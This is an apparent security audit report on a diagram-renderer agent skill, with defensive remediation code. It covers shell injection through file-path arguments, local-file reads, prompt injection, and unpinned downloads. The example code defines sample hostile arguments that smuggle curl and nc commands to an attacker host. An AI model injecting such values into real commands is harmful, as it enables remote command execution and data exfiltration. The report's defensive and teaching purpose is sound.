diagram-renderer
Fail
Audited by Gen Agent Trust Hub on Mar 4, 2026
Risk Level: HIGH
Findings: COMMAND_EXECUTION, DATA_EXFILTRATION, PROMPT_INJECTION, EXTERNAL_DOWNLOADS
Full Analysis
- [COMMAND_EXECUTION]: The skill executes shell commands with execSync in src/index.ts and src/lib.ts. The variables mmdPath and outputPath are interpolated directly into the command string. Because these paths come from user-controlled arguments (--input, --out), an attacker can inject arbitrary shell commands by placing shell metacharacters (e.g., ;, &, |) in the file names.
- [DATA_EXFILTRATION]: In src/lib.ts, the renderDiagram function invokes the Mermaid CLI with the --allow-local-files flag, which lets the renderer read the local filesystem. Because the skill accepts raw diagram code through the elements.diagram field, a malicious diagram can reference sensitive local files (e.g., via CSS or image tags), and their contents end up in the rendered output.
- [PROMPT_INJECTION]: The skill is vulnerable to indirect prompt injection because it accepts raw Mermaid diagram code in the elements.diagram field without sanitization.
  - Ingestion points: the input JSON file processed in src/index.ts and src/lib.ts via the ADF interface.
  - Boundary markers: no markers or delimiters encapsulate user-provided diagram content.
  - Capability inventory: execSync for shell execution, plus filesystem access for reading and writing artifacts.
  - Sanitization: none is applied to the diagram content or to the command-line arguments.
- [EXTERNAL_DOWNLOADS]: The skill downloads the official @mermaid-js/mermaid-cli package from the NPM registry at run time using npx -y.
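The COMMAND_EXECUTION and DATA_EXFILTRATION findings above, as an added example that is not the skill's own code: the vulnerable string-built command sits beside a hardened version that confines both paths to a working directory, passes an argument array to execFileSync so that no shell ever parses the file names, leaves out --allow-local-files, and runs a heuristic pre-check over the diagram source before rendering. The names buildCommandUnsafe, resolveWithin, buildRenderArgv, findLocalFileIndicators, the HOSTILE_* inputs and the indicator patterns are assumptions made for this illustration; the only identifiers taken from the audit are renderDiagram, execSync, mmdPath, outputPath and the npx invocation of @mermaid-js/mermaid-cli.

```typescript
import { execFileSync } from "node:child_process";
import * as fs from "node:fs";
import * as path from "node:path";

// Constructed hostile arguments (assumption: an attacker controls --input/--out).
export const HOSTILE_INPUT = "diagram.mmd; curl http://attacker.example/$(id)";
export const HOSTILE_OUT = "out.svg | nc attacker.example 4444";

// Vulnerable shape: one shell string assembled by interpolation. execSync hands
// this to /bin/sh, so ';', '|' and '$()' in either path run as commands.
export function buildCommandUnsafe(mmdPath: string, outputPath: string): string {
  return `npx -y @mermaid-js/mermaid-cli -i ${mmdPath} -o ${outputPath}`;
}

// Hardened: confine a user-supplied path to baseDir and require an expected
// extension. The result is absolute, so it can never be parsed as a CLI option.
export function resolveWithin(baseDir: string, userPath: string, allowedExts: string[]): string {
  const base = path.resolve(baseDir);
  const resolved = path.resolve(base, userPath);
  const rel = path.relative(base, resolved);
  if (rel === "" || rel === ".." || rel.startsWith(".." + path.sep) || path.isAbsolute(rel)) {
    throw new Error(`path escapes ${base}: ${userPath}`);
  }
  if (!allowedExts.includes(path.extname(resolved).toLowerCase())) {
    throw new Error(`unexpected extension for ${userPath}`);
  }
  return resolved;
}

// Hardened: an argv array, never a shell string. --allow-local-files is omitted
// on purpose; the audit identifies it as the local-file read primitive.
export function buildRenderArgv(baseDir: string, mmdPath: string, outputPath: string): string[] {
  const input = resolveWithin(baseDir, mmdPath, [".mmd"]);
  const output = resolveWithin(baseDir, outputPath, [".svg", ".png", ".pdf"]);
  return ["-y", "@mermaid-js/mermaid-cli", "-i", input, "-o", output];
}

// Heuristic pre-check on diagram source (assumption: these constructs are the
// usual routes to local-file reads when HTML labels or CSS are honoured).
// Defence in depth only; dropping --allow-local-files is the actual fix.
const LOCAL_FILE_INDICATORS: Array<[string, RegExp]> = [
  ["file-uri", /\bfile:\/\//i],
  ["html-tag", /<\s*(img|iframe|object|embed|link|script|style)\b/i],
  ["css-url", /\burl\s*\(/i],
  ["css-import", /@import\b/i],
];

export function findLocalFileIndicators(diagram: string): string[] {
  return LOCAL_FILE_INDICATORS.filter(([, re]) => re.test(diagram)).map(([name]) => name);
}

// Writes the untrusted diagram to the confined input path, then runs the CLI
// without a shell: execFileSync passes argv straight to npx.
export function renderDiagram(baseDir: string, diagram: string, mmdPath: string, outputPath: string): void {
  const hits = findLocalFileIndicators(diagram);
  if (hits.length > 0) {
    throw new Error(`diagram rejected: ${hits.join(", ")}`);
  }
  const input = resolveWithin(baseDir, mmdPath, [".mmd"]);
  fs.writeFileSync(input, diagram, "utf8");
  execFileSync("npx", buildRenderArgv(baseDir, mmdPath, outputPath), { stdio: "inherit" });
}
```

The indicator list will reject some legitimate diagrams that use HTML labels, which is the intended trade-off for a renderer exposed to untrusted input; tighten or relax it per deployment. Separately from the injection fix, the EXTERNAL_DOWNLOADS finding is easier to reason about if the npx package spec carries a pinned version instead of resolving whatever the registry currently serves.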
Recommendations
- AI detected serious security threats.
- Build the Mermaid CLI invocation as an argument array (execFileSync or spawnSync) instead of interpolating mmdPath and outputPath into an execSync command string, and confine both paths to the skill's working directory.
- Remove the --allow-local-files flag so that diagram content cannot pull local files into the rendered output.
- Treat elements.diagram as untrusted input: delimit it clearly wherever it is passed on, and reject constructs that reference local resources.
- Pin the version of @mermaid-js/mermaid-cli that npx -y fetches, or vendor it, so that run-time downloads cannot pull an unexpected release.
Audit Metadata